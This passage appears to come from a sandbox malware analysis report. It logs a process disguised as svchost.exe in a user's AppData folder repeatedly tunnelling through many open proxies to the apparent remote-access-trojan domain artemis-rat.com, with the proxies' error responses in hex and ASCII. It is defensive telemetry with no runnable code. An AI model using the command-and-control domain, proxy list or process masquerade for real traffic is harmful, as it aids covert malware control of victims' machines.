                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2945192.168.2.559593172.67.250.2128043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.588911057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.743118048 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2946192.168.2.559477222.179.155.90909143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.602442026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.963273048 CET325INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.12.1
                                                                                    Date: Sat, 09 Mar 2024 12:11:49 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 173
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2947192.168.2.55947851.161.131.846305543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.602644920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.380518913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.548232079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2948192.168.2.559765211.234.125.544343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.610634089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2949192.168.2.559767211.234.125.544343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.612196922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2950192.168.2.55950346.17.63.166415443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.613403082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.910753965 CET339INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/4.7
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 5
                                                                                    X-Squid-Error: TCP_RESET 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from proxy.wakoopa.com
                                                                                    Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 72 65 73 65 74
                                                                                    Data Ascii: reset


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2951192.168.2.559771211.234.125.544343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.613569021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2952192.168.2.559774211.234.125.544343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.614731073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2953192.168.2.55935551.68.164.775450443220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.622195959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.646107912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.333599091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.442946911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2954192.168.2.559622172.67.181.1978043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.654493093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.808835983 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2955192.168.2.559065129.151.72.858043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.667721033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2956192.168.2.55956638.162.0.221312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.668394089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.116548061 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm=""
                                                                                    Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                    Data Ascii: Proxy Authentication Required


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2957192.168.2.55959045.196.151.97543243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.668921947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.886904955 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Server: FaaS v1.3-20220203-7fa38bd5af
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Content-Length: 65
                                                                                    Proxy-Authenticate: Basic realm="Proxy"
                                                                                    Connection: close
                                                                                    Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                                                                    Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2958192.168.2.559544184.185.2.12414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.669022083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.380436897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.380511999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2959192.168.2.55950961.111.38.58043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.669367075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.965749979 CET507INHTTP/1.1 502 Proxy Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 341
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 32 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 72 65 63 65 69 76 65 64 20 61 6e 20 69 6e 76 61 6c 69 64 0d 0a 72 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 61 6e 20 75 70 73 74 72 65 61 6d 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0d 0a 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 45 72 72 6f 72 20 72 65 61 64 69 6e 67 20 66 72 6f 6d 20 72 65 6d 6f 74 65 20 73 65 72 76 65 72 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Proxy Error</title></head><body><h1>Proxy Error</h1><p>The proxy server received an invalidresponse from an upstream server.<br />The proxy server could not handle the request<p>Reason: <strong>Error reading from remote server</strong></p></p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2960192.168.2.559501203.95.198.170808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.671431065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.033875942 CET340INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.12.2
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 173
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2961192.168.2.559600159.203.61.169312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.671653032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.601818085 CET28INHTTP/1.1 400 Bad Request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2962192.168.2.5595575.161.179.239312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.674834013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.333343029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.146239996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.646285057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.333844900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2963192.168.2.55951743.155.142.1161567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.683831930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2964192.168.2.5595318.210.80.1911567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.684441090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2965192.168.2.559628162.241.137.1976104143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.709203005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.333595037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.942903996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.146311998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.646205902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2966192.168.2.559636142.54.228.193414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.719517946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2967192.168.2.55965274.48.7.438043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.726165056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2968192.168.2.559093138.68.60.8312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.727540016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.904683113 CET28INHTTP/1.1 400 Bad Request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2969192.168.2.55967545.14.174.1808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.729897976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.884191036 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
